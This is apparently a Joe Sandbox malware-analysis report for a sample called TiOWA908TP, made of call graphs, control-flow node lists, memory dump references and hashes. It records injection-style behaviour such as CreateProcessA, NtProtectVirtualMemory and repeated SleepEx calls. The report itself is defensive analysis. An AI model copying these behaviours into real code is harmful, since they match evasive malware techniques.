66801 6cd0fb0 66800->66801 66803 6cd1418 2 API calls 66801->66803 66804 6cd1413 2 API calls 66801->66804 66802 6cd0fd7 66802->66802 66803->66802 66804->66802 66806 6cd1445 66805->66806 66807 6cd0530 2 API calls 66806->66807 66809 6cd15db 66806->66809 66808 6cd15cc 66807->66808 66808->66797 66809->66797 66811 6cd1445 66810->66811 66812 6cd0530 2 API calls 66811->66812 66814 6cd15db 66811->66814 66813 6cd15cc 66812->66813 66813->66797 66814->66797 67025 70b88e7 67026 70b8527 67025->67026 67027 6fae568 2 API calls 67026->67027 67028 6fae558 2 API calls 67026->67028 67029 6fae510 2 API calls 67026->67029 67027->67026 67028->67026 67029->67026 66815 59d5190 66816 59d51f4 CreateProcessA 66815->66816 66818 59d537c 66816->66818 66819 59d4790 66820 59d47de NtProtectVirtualMemory 66819->66820 66822 59d4828 66820->66822 66823 70b8a84 66824 70b8527 66823->66824 66828 6fae568 66824->66828 66835 6fae558 66824->66835 66842 6fae510 66824->66842 66829 6fae57d 66828->66829 66850 6fae945 66829->66850 66856 6fae9b0 66829->66856 66861 6fae915 66829->66861 66866 6fae9a0 66829->66866 66830 6fae593 66830->66824 66836 6fae55c 66835->66836 66838 6fae9b0 2 API calls 66836->66838 66839 6fae9a0 2 API calls 66836->66839 66840 6fae945 2 API calls 66836->66840 66841 6fae915 2 API calls 66836->66841 66837 6fae593 66837->66824 66838->66837 66839->66837 66840->66837 66841->66837 66843 6fae57f 66842->66843 66845 6fae51a 66842->66845 66844 6fae593 66843->66844 66846 6fae9b0 2 API calls 66843->66846 66847 6fae9a0 2 API calls 66843->66847 66848 6fae945 2 API calls 66843->66848 66849 6fae915 2 API calls 66843->66849 66844->66824 66845->66824 66846->66844 66847->66844 66848->66844 66849->66844 66851 6fae94a 66850->66851 66853 6fae91f 66850->66853 66852 6faeaae 66852->66830 66853->66850 66853->66852 66871 7081f91 66853->66871 66875 7081f98 66853->66875 66858 6fae9da 66856->66858 66857 6faeaae 66857->66830 66858->66857 66859 7081f98 SleepEx 66858->66859 66860 7081f91 SleepEx 66858->66860 66859->66858 66860->66858 66863 6fae918 66861->66863 66862 6fae8f0 66862->66830 66863->66862 66864 7081f98 SleepEx 66863->66864 66865 7081f91 SleepEx 66863->66865 66864->66863 66865->66863 66867 6fae9a8 66866->66867 66868 6faeaae 66867->66868 66869 7081f98 SleepEx 66867->66869 66870 7081f91 SleepEx 66867->66870 66868->66830 66869->66867 66870->66867 66872 7081f94 SleepEx 66871->66872 66874 7082016 66872->66874 66874->66853 66876 7081f9e SleepEx 66875->66876 66878 7082016 66876->66878 66878->66853

                                  Executed Functions

                                  Function 06CD5528 Relevance: 8.5, Strings: 6, Instructions: 983COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 6cd5528-6cd5549 1 6cd554b 0->1 2 6cd5550-6cd5637 0->2 1->2 4 6cd563d-6cd577e 2->4 5 6cd5d39-6cd5d61 2->5 49 6cd5784-6cd57df 4->49 50 6cd5d02-6cd5d2c 4->50 8 6cd6467-6cd6470 5->8 9 6cd5d6f-6cd5d79 8->9 10 6cd6476-6cd648d 8->10 12 6cd5d7b 9->12 13 6cd5d80-6cd5e74 9->13 12->13 31 6cd5e9e 13->31 32 6cd5e76-6cd5e82 13->32 36 6cd5ea4-6cd5ec4 31->36 34 6cd5e8c-6cd5e92 32->34 35 6cd5e84-6cd5e8a 32->35 38 6cd5e9c 34->38 35->38 41 6cd5f24-6cd5fa4 36->41 42 6cd5ec6-6cd5f1f 36->42 38->36 63 6cd5ffb-6cd603e 41->63 64 6cd5fa6-6cd5ff9 41->64 53 6cd6464 42->53 57 6cd57e4-6cd57ef 49->57 58 6cd57e1 49->58 60 6cd5d2e 50->60 61 6cd5d36 50->61 53->8 62 6cd5c17-6cd5c1d 57->62 58->57 60->61 61->5 65 6cd57f4-6cd5812 62->65 66 6cd5c23-6cd5c9f call 6cd00d0 62->66 91 6cd6049-6cd6052 63->91 64->91 69 6cd5869-6cd587e 65->69 70 6cd5814-6cd5818 65->70 108 6cd5cec-6cd5cf2 66->108 72 6cd5885-6cd589b 69->72 73 6cd5880 69->73 70->69 74 6cd581a-6cd5825 70->74 78 6cd589d 72->78 79 6cd58a2-6cd58b9 72->79 73->72 75 6cd585b-6cd5861 74->75 80 6cd5827-6cd582b 75->80 81 6cd5863-6cd5864 75->81 78->79 83 6cd58bb 79->83 84 6cd58c0-6cd58d6 79->84 85 6cd582d 80->85 86 6cd5831-6cd5849 80->86 90 6cd58e7-6cd5952 81->90 83->84 87 6cd58dd-6cd58e4 84->87 88 6cd58d8 84->88 85->86 92 6cd584b 86->92 93 6cd5850-6cd5858 86->93 87->90 88->87 94 6cd5954-6cd5960 90->94 95 6cd5966-6cd5b1b 90->95 97 6cd60b2-6cd60c1 91->97 92->93 93->75 94->95 106 6cd5b1d-6cd5b21 95->106 107 6cd5b7f-6cd5b94 95->107 98 6cd6054-6cd607c 97->98 99 6cd60c3-6cd614b 97->99 103 6cd607e 98->103 104 6cd6083-6cd60ac 98->104 138 6cd62c4-6cd62d0 99->138 103->104 104->97 106->107 114 6cd5b23-6cd5b32 106->114 112 6cd5b9b-6cd5bbc 107->112 113 6cd5b96 107->113 110 6cd5cf4-6cd5cfa 108->110 111 6cd5ca1-6cd5ce9 call 6cd04e8 * 2 108->111 110->50 111->108 115 6cd5bbe 112->115 116 6cd5bc3-6cd5be2 112->116 113->112 118 6cd5b71-6cd5b77 114->118 115->116 123 6cd5be9-6cd5c09 116->123 124 6cd5be4 116->124 121 6cd5b79-6cd5b7a 118->121 122 6cd5b34-6cd5b38 118->122 126 6cd5c14 121->126 128 6cd5b3a-6cd5b3e 122->128 129 6cd5b42-6cd5b63 122->129 130 6cd5c0b 123->130 131 6cd5c10 123->131 124->123 126->62 128->129 134 6cd5b6a-6cd5b6e 129->134 135 6cd5b65 129->135 130->131 131->126 134->118 135->134 139 6cd62d6-6cd6331 138->139 140 6cd6150-6cd6159 138->140 155 6cd6368-6cd6392 139->155 156 6cd6333-6cd6366 139->156 141 6cd615b 140->141 142 6cd6162-6cd62b8 140->142 141->142 143 6cd61ad-6cd61ed 141->143 144 6cd6168-6cd61a8 141->144 145 6cd6237-6cd6277 141->145 146 6cd61f2-6cd6232 141->146 159 6cd62be 142->159 143->159 144->159 145->159 146->159 164 6cd639b-6cd642e 155->164 156->164 159->138 168 6cd6435-6cd6455 164->168 168->53
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2481610209.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6cd0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,YF$TJhq$Tecq$Upt$pgq$xbfq
                                  • API String ID: 0-1615976268
                                  • Opcode ID: 4b115aca8d77e078f5ec6f7daa100186074c3af1d8a69e520753b1a256aa2aa7
                                  • Instruction ID: 611aa2adcfdfdc87bd1cabb3a4a5312c1b31e9d0ad8a442eb6d8c43fad3362ff
                                  • Opcode Fuzzy Hash: 4b115aca8d77e078f5ec6f7daa100186074c3af1d8a69e520753b1a256aa2aa7
                                  • Instruction Fuzzy Hash: 3CA2B575A00228CFDB65CF69C984A9DBBB2FF89304F1581E9D509AB365DB319E81CF40
                                  Function 06CD78F3 Relevance: 3.8, Strings: 2, Instructions: 1339COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 585 6cd78f3-6cd792e 586 6cd7935-6cd7a57 585->586 587 6cd7930 585->587 591 6cd7a59-6cd7a6f 586->591 592 6cd7a7b-6cd7a87 586->592 587->586 869 6cd7a75 call 6cda48b 591->869 870 6cd7a75 call 6cda490 591->870 593 6cd7a8e-6cd7a93 592->593 594 6cd7a89 592->594 595 6cd7acb-6cd7b14 593->595 596 6cd7a95-6cd7aa1 593->596 594->593 606 6cd7b1b-6cd7de0 595->606 607 6cd7b16 595->607 598 6cd7aa8-6cd7ac6 596->598 599 6cd7aa3 596->599 600 6cd922f-6cd9235 598->600 599->598 602 6cd9237-6cd9257 600->602 603 6cd9260 600->603 602->603 632 6cd8810-6cd881c 606->632 607->606 633 6cd7de5-6cd7df1 632->633 634 6cd8822-6cd885a 632->634 635 6cd7df8-6cd7f1d 633->635 636 6cd7df3 633->636 643 6cd8934-6cd893a 634->643 671 6cd7f5d-6cd7fe6 635->671 672 6cd7f1f-6cd7f57 635->672 636->635 644 6cd885f-6cd88dc 643->644 645 6cd8940-6cd8978 643->645 660 6cd890f-6cd8931 644->660 661 6cd88de-6cd88e2 644->661 656 6cd8cd6-6cd8cdc 645->656 658 6cd897d-6cd8a59 656->658 659 6cd8ce2-6cd8d2a 656->659 702 6cd8a65-6cd8b7f 658->702 668 6cd8d2c-6cd8d9f 659->668 669 6cd8da5-6cd8df0 659->669 660->643 661->660 664 6cd88e4-6cd890c 661->664 664->660 668->669 691 6cd91f9-6cd91ff 669->691 699 6cd7fe8-6cd7ff0 671->699 700 6cd7ff5-6cd8079 671->700 672->671 693 6cd8df5-6cd8e77 691->693 694 6cd9205-6cd922d 691->694 712 6cd8e9f-6cd8eab 693->712 713 6cd8e79-6cd8e94 693->713 694->600 701 6cd8801-6cd880d 699->701 725 6cd8088-6cd810c 700->725 726 6cd807b-6cd8083 700->726 701->632 752 6cd8c1e-6cd8c22 702->752 753 6cd8b85-6cd8c19 702->753 714 6cd8ead 712->714 715 6cd8eb2-6cd8ebe 712->715 713->712 714->715 717 6cd8ed1-6cd8ee0 715->717 718 6cd8ec0-6cd8ecc 715->718 723 6cd8ee9-6cd91c1 717->723 724 6cd8ee2 717->724 722 6cd91e0-6cd91f6 718->722 722->691 758 6cd91cc-6cd91d8 723->758 724->723 727 6cd8f5d-6cd8fd5 724->727 728 6cd8eef-6cd8f58 724->728 729 6cd9048-6cd90b1 724->729 730 6cd8fda-6cd9043 724->730 731 6cd90b6-6cd911e 724->731 777 6cd810e-6cd8116 725->777 778 6cd811b-6cd819f 725->778 726->701 727->758 728->758 729->758 730->758 763 6cd9192-6cd9198 731->763 760 6cd8c7f-6cd8cbc 752->760 761 6cd8c24-6cd8c7d 752->761 775 6cd8cbd-6cd8cd3 753->775 758->722 760->775 761->775 766 6cd919a-6cd91a4 763->766 767 6cd9120-6cd917e 763->767 766->758 783 6cd9185-6cd918f 767->783 784 6cd9180 767->784 775->656 777->701 790 6cd81ae-6cd8232 778->790 791 6cd81a1-6cd81a9 778->791 783->763 784->783 797 6cd8234-6cd823c 790->797 798 6cd8241-6cd82c5 790->798 791->701 797->701 804 6cd82d4-6cd8358 798->804 805 6cd82c7-6cd82cf 798->805 811 6cd835a-6cd8362 804->811 812 6cd8367-6cd83eb 804->812 805->701 811->701 818 6cd83ed-6cd83f5 812->818 819 6cd83fa-6cd847e 812->819 818->701 825 6cd848d-6cd8511 819->825 826 6cd8480-6cd8488 819->826 832 6cd8520-6cd85a4 825->832 833 6cd8513-6cd851b 825->833 826->701 839 6cd85a6-6cd85ae 832->839 840 6cd85b3-6cd8637 832->840 833->701 839->701 846 6cd8639-6cd8641 840->846 847 6cd8646-6cd86ca 840->847 846->701 853 6cd86cc-6cd86d4 847->853 854 6cd86d9-6cd875d 847->854 853->701 860 6cd876c-6cd87f0 854->860 861 6cd875f-6cd8767 854->861 867 6cd87fc-6cd87fe 860->867 868 6cd87f2-6cd87fa 860->868 861->701 867->701 868->701 869->592 870->592
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2481610209.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6cd0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2$$cq
                                  • API String ID: 0-1429447105
                                  • Opcode ID: f6f595d2eec9253aaf98fc55d9faab0d495a5951f5053e945fba07fd0a645cd3
                                  • Instruction ID: 4c7507d88845382ff1582baf9147ab2d8e272576a623e16a97fa0aaf5054b248
                                  • Opcode Fuzzy Hash: f6f595d2eec9253aaf98fc55d9faab0d495a5951f5053e945fba07fd0a645cd3
                                  • Instruction Fuzzy Hash: 0EE2D378A016288FDB65DF68DC88B9EBBB5FB89304F1081E9D509A7354DB349E85CF40
                                  Function 059D0F30 Relevance: 3.1, Strings: 2, Instructions: 613COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 871 59d0f30-59d0f51 872 59d0f58-59d103b call 59d1a80 871->872 873 59d0f53 871->873 881 59d103d-59d1048 872->881 882 59d104a 872->882 873->872 883 59d1054-59d116f 881->883 882->883 894 59d1181-59d11ac 883->894 895 59d1171-59d1177 883->895 896 59d1960-59d197c 894->896 895->894 897 59d11b1-59d1314 896->897 898 59d1982-59d199d 896->898 908 59d1326-59d142e call 59d35f8 897->908 909 59d1316-59d131c 897->909 916 59d1434-59d14a3 908->916 909->908 919 59d1508-59d1512 916->919 920 59d14a5-59d14a9 916->920 921 59d1739-59d1758 919->921 922 59d14ab-59d14ac 920->922 923 59d14b1-59d1503 920->923 924 59d175e-59d1788 921->924 925 59d1517-59d165d 921->925 926 59d17de-59d1849 922->926 923->926 932 59d17db-59d17dc 924->932 933 59d178a-59d17d8 924->933 954 59d1663-59d172f 925->954 955 59d1732-59d1733 925->955 942 59d185b-59d18a6 926->942 943 59d184b-59d1851 926->943 932->926 933->932 944 59d18ac-59d1944 942->944 945 59d1945-59d195d 942->945 943->942 944->945 945->896 954->955 955->921
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: fhq$8
                                  • API String ID: 0-3528958667
                                  • Opcode ID: 3d1117017ce84d92389dee1f0277435a360f3a6718f7e84721211e77ef0dfbf8
                                  • Instruction ID: 9bb8e508d3bb5db05fcb918c1b814da84bb56382e39d5d87e37d47de4e41dc9d
                                  • Opcode Fuzzy Hash: 3d1117017ce84d92389dee1f0277435a360f3a6718f7e84721211e77ef0dfbf8
                                  • Instruction Fuzzy Hash: 5052B375E01629CFDB64DF69D894AD9BBB2FB89300F1086E9D509A7350DB30AE81CF50
                                  Function 06E3D4A5 Relevance: 3.0, Strings: 2, Instructions: 495COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1203 6e3d4a5 1204 6e3d4ad-6e3d4b7 1203->1204 1206 6e3d4b9-6e3d4d7 1204->1206 1207 6e3d4dd-6e3d4e0 1204->1207 1206->1207 1212 6e3d6ae-6e3d6c0 1206->1212 1208 6e3d4e6-6e3d4ec 1207->1208 1209 6e3d665-6e3d66c 1207->1209 1208->1209 1210 6e3d4f2-6e3d4fb 1208->1210 1214 6e3d533-6e3d539 1210->1214 1215 6e3d4fd-6e3d50c 1210->1215 1224 6e3d6c2 1212->1224 1225 6e3d67f-6e3d6a7 1212->1225 1217 6e3d644-6e3d64a 1214->1217 1218 6e3d53f-6e3d548 1214->1218 1215->1214 1223 6e3d50e-6e3d527 1215->1223 1217->1209 1221 6e3d64c-6e3d65c 1217->1221 1218->1217 1226 6e3d54e-6e3d55a 1218->1226 1221->1209 1234 6e3d65e-6e3d663 1221->1234 1223->1214 1237 6e3d529-6e3d52c 1223->1237 1227 6e3d6c4-6e3d6c9 1224->1227 1228 6e3d6ca 1224->1228 1225->1212 1240 6e3d560-6e3d588 1226->1240 1241 6e3d5f8-6e3d63c 1226->1241 1227->1228 1232 6e3d6d2-6e3d6d5 1228->1232 1233 6e3d6cc-6e3d6ce 1228->1233 1235 6e3d6d6-6e3d6f9 1232->1235 1233->1235 1238 6e3d6cf-6e3d6d1 1233->1238 1234->1209 1247 6e3d732-6e3d734 1235->1247 1248 6e3d6fb-6e3d708 1235->1248 1237->1214 1238->1232 1240->1241 1255 6e3d58a-6e3d5c7 1240->1255 1241->1217 1250 6e3db7f-6e3db86 1247->1250 1248->1247 1254 6e3d70a-6e3d730 1248->1254 1254->1247 1264 6e3d739-6e3d76d 1254->1264 1255->1241 1267 6e3d5c9-6e3d5f6 1255->1267 1272 6e3d773-6e3d77c 1264->1272 1273 6e3d810-6e3d81f 1264->1273 1267->1217 1274 6e3d782-6e3d795 1272->1274 1275 6e3db87-6e3db8f 1272->1275 1278 6e3d821-6e3d837 1273->1278 1279 6e3d85e 1273->1279 1284 6e3d797-6e3d7b0 1274->1284 1285 6e3d7fe-6e3d80a 1274->1285 1289 6e3d857-6e3d85c 1278->1289 1290 6e3d839-6e3d855 1278->1290 1283 6e3d860-6e3d865 1279->1283 1287 6e3d867-6e3d888 1283->1287 1288 6e3d8a8-6e3d8c4 1283->1288 1284->1285 1298 6e3d7b2-6e3d7c0 1284->1298 1285->1272 1285->1273 1287->1288 1303 6e3d88a 1287->1303 1295 6e3d8ca-6e3d8d3 1288->1295 1296 6e3d98c-6e3d995 1288->1296 1289->1283 1290->1283 1295->1275 1301 6e3d8d9-6e3d8f6 1295->1301 1299 6e3d99b 1296->1299 1300 6e3db7d 1296->1300 1298->1285 1311 6e3d7c2-6e3d7c6 1298->1311 1304 6e3d9a2-6e3d9a4 1299->1304 1305 6e3da06-6e3da14 1299->1305 1306 6e3d9a9-6e3d9b7 1299->1306 1300->1250 1323 6e3d97a-6e3d986 1301->1323 1324 6e3d8fc-6e3d912 1301->1324 1307 6e3d88d-6e3d8a6 1303->1307 1304->1250 1313 6e3da16-6e3da1e 1305->1313 1314 6e3da2c-6e3da43 1305->1314 1317 6e3d9b9-6e3d9c1 1306->1317 1318 6e3d9cf-6e3d9d6 1306->1318 1307->1288 1311->1275 1316 6e3d7cc-6e3d7e5 1311->1316 1313->1314 1329 6e3da45-6e3da4d 1314->1329 1330 6e3da5b-6e3da6e 1314->1330 1316->1285 1334 6e3d7e7-6e3d7fb 1316->1334 1317->1318 1318->1250 1323->1295 1323->1296 1324->1323 1335 6e3d914-6e3d922 1324->1335 1329->1330 1338 6e3da70-6e3da78 1330->1338 1339 6e3da86-6e3daa3 1330->1339 1334->1285 1335->1323 1343 6e3d924-6e3d928 1335->1343 1338->1339 1349 6e3daa5-6e3daad 1339->1349 1350 6e3dabb 1339->1350 1343->1275 1346 6e3d92e-6e3d957 1343->1346 1346->1323 1354 6e3d959-6e3d977 1346->1354 1349->1350 1350->1250 1354->1323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482418539.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6e30000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Plcq$$cq
                                  • API String ID: 0-705662705
                                  • Opcode ID: 436c8b871580f6fc4d955c3e576bebaef04b6aaeeff2bc14f1cdc62123376f0d
                                  • Instruction ID: 2434275d8318e1e5d04e5a3ede0744c157da0a616cc1650a1bdfb5f3ddff8317
                                  • Opcode Fuzzy Hash: 436c8b871580f6fc4d955c3e576bebaef04b6aaeeff2bc14f1cdc62123376f0d
                                  • Instruction Fuzzy Hash: 51121474B002148FDB55DF29C988A6ABBF2FF89314F1594A9E506CB3A5DB31EC41CB60
                                  Function 059D0F22 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1877 59d0f22-59d0f51 1880 59d0f58-59d103b call 59d1a80 1877->1880 1881 59d0f53 1877->1881 1889 59d103d-59d1048 1880->1889 1890 59d104a 1880->1890 1881->1880 1891 59d1054-59d116f 1889->1891 1890->1891 1902 59d1181-59d11ac 1891->1902 1903 59d1171-59d1177 1891->1903 1904 59d1960-59d197c 1902->1904 1903->1902 1905 59d11b1-59d1314 1904->1905 1906 59d1982-59d199d 1904->1906 1916 59d1326-59d142e call 59d35f8 1905->1916 1917 59d1316-59d131c 1905->1917 1924 59d1434-59d14a3 1916->1924 1917->1916 1927 59d1508-59d1512 1924->1927 1928 59d14a5-59d14a9 1924->1928 1929 59d1739-59d1758 1927->1929 1930 59d14ab-59d14ac 1928->1930 1931 59d14b1-59d1503 1928->1931 1932 59d175e-59d1788 1929->1932 1933 59d1517-59d165d 1929->1933 1934 59d17de-59d1849 1930->1934 1931->1934 1940 59d17db-59d17dc 1932->1940 1941 59d178a-59d17d8 1932->1941 1962 59d1663-59d172f 1933->1962 1963 59d1732-59d1733 1933->1963 1950 59d185b-59d18a6 1934->1950 1951 59d184b-59d1851 1934->1951 1940->1934 1941->1940 1952 59d18ac-59d1944 1950->1952 1953 59d1945-59d195d 1950->1953 1951->1950 1952->1953 1953->1904 1962->1963 1963->1929
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: fhq$h
                                  • API String ID: 0-3107779391
                                  • Opcode ID: cebeb17aa8594e6aef3a02d5756e5aaadcb587371762c83eb7d94d6aae12a0fc
                                  • Instruction ID: a217cae6d0c7ec56138e065638d95de1befca46aaa45017f6645be604fe8303b
                                  • Opcode Fuzzy Hash: cebeb17aa8594e6aef3a02d5756e5aaadcb587371762c83eb7d94d6aae12a0fc
                                  • Instruction Fuzzy Hash: F4710675E016298FDB64DF69D844BDABBB2FB89304F1082AAD509A7240DB306E85CF50
                                  Function 06FA9EB8 Relevance: 2.1, Strings: 1, Instructions: 816COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (gq
                                  • API String ID: 0-1972435379
                                  • Opcode ID: 5823043a5c02d16bf0ba8f1bfb1b9ecfce2c0d2fe39309cd7c73ee2060cada34
                                  • Instruction ID: 3fbbf93acf61f2d9d433b5824ff68537259911fff6026ce58efe7ff38152cc63
                                  • Opcode Fuzzy Hash: 5823043a5c02d16bf0ba8f1bfb1b9ecfce2c0d2fe39309cd7c73ee2060cada34
                                  • Instruction Fuzzy Hash: 79628AB4E007159FCB99CF69C498A6EBBF2FF88300F248529D556D7391DB30A949CB90
                                  Function 070B9990 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2483051934.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70b0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tecq
                                  • API String ID: 0-1122318316
                                  • Opcode ID: fa84d42b40e516081f75a0e8a2d9c385d553b712c7d32e578c84dd62652bcdaf
                                  • Instruction ID: 18615f7a01d0949f995c4d7d1cce86a3ae1906222262c729dc01a29fbc429083
                                  • Opcode Fuzzy Hash: fa84d42b40e516081f75a0e8a2d9c385d553b712c7d32e578c84dd62652bcdaf
                                  • Instruction Fuzzy Hash: 6502E2B4A15229CFDB64CF69D888BEDB7B6FB89300F1081A9C519A7351DB746E85CF00
                                  Function 070B9980 Relevance: 1.7, Strings: 1, Instructions: 404COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2483051934.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70b0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tecq
                                  • API String ID: 0-1122318316
                                  • Opcode ID: 2a585c8b004ef1179ee0df1c4c8d24b407c4257d006f27e10da42c7f669ffea2
                                  • Instruction ID: 3d0009c755484ea92deefa4cc6af8edb8d1e3dcd21bff490a5fab6b8e481105c
                                  • Opcode Fuzzy Hash: 2a585c8b004ef1179ee0df1c4c8d24b407c4257d006f27e10da42c7f669ffea2
                                  • Instruction Fuzzy Hash: 9902D1B4A15229CFDB64CF69D888BDDB7B2FB89300F1081A9C519A7351DB746E85CF40
                                  Function 06FAF563 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHcq
                                  • API String ID: 0-4245845256
                                  • Opcode ID: 9ffbd37457e5759064be933901443f7f92bdc590b8ca531b2729674b3c31d20c
                                  • Instruction ID: 9727b2a60e89a9d8cd607353abe058f3fe794cfee8c6f5fb15f6c222dfc124b3
                                  • Opcode Fuzzy Hash: 9ffbd37457e5759064be933901443f7f92bdc590b8ca531b2729674b3c31d20c
                                  • Instruction Fuzzy Hash: 40D106B4E06318CFEBA4CFA9D98879DBBB2FB49304F1080A9D509AB355DB345985CF41
                                  Function 06FAF51B Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHcq
                                  • API String ID: 0-4245845256
                                  • Opcode ID: 64eb5b67f5901f6260491ce98e768755e028429d929d44986f5b7f2f062a2ea4
                                  • Instruction ID: 9c697a38ae19b0ae03e52b890f54a78bc977a6aa0e553a4674a314aee05f0937
                                  • Opcode Fuzzy Hash: 64eb5b67f5901f6260491ce98e768755e028429d929d44986f5b7f2f062a2ea4
                                  • Instruction Fuzzy Hash: 89E1E3B4E06318CFEBA4CFA9D98879DBBB2FB49304F1080AAD509AB355D7345985CF41
                                  Function 06FAF570 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHcq
                                  • API String ID: 0-4245845256
                                  • Opcode ID: b79ca59a0cea86a154d9b023cacd1a1c7c673dd853572fa5e97afd1af74d759b
                                  • Instruction ID: 68db0316acbc4f991242dcee1d827008577dde08e25075f064e3457e402c229b
                                  • Opcode Fuzzy Hash: b79ca59a0cea86a154d9b023cacd1a1c7c673dd853572fa5e97afd1af74d759b
                                  • Instruction Fuzzy Hash: 2DD1F5B4E06318CFEBA4CFA9D9887ADBBB2FB49304F1090A9C509AB355D7345985CF41
                                  Function 059D4788 Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 059D4819
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 190a742c73713aa16ad57222d5690fdb1daaa7e1cc2c57da4c227004965757ea
                                  • Instruction ID: e1b55bc57cfa7cbf8e8e4c058758ee76d0428de403d6b384a4b18de62159d322
                                  • Opcode Fuzzy Hash: 190a742c73713aa16ad57222d5690fdb1daaa7e1cc2c57da4c227004965757ea
                                  • Instruction Fuzzy Hash: D621F4B1D003499FCB10CFAAD984ADEFBF5FF48310F50842AE519A3200C775A940CBA1
                                  Function 059D4790 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 059D4819
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 3ae69ee6e2100b834ad506ad2906c77a50ff33d403601f0c74f27cee0763f1b4
                                  • Instruction ID: 3ccec6c6cc60a873034fc0f203e3915f507c829cb52ec08d65cea01057ebbf24
                                  • Opcode Fuzzy Hash: 3ae69ee6e2100b834ad506ad2906c77a50ff33d403601f0c74f27cee0763f1b4
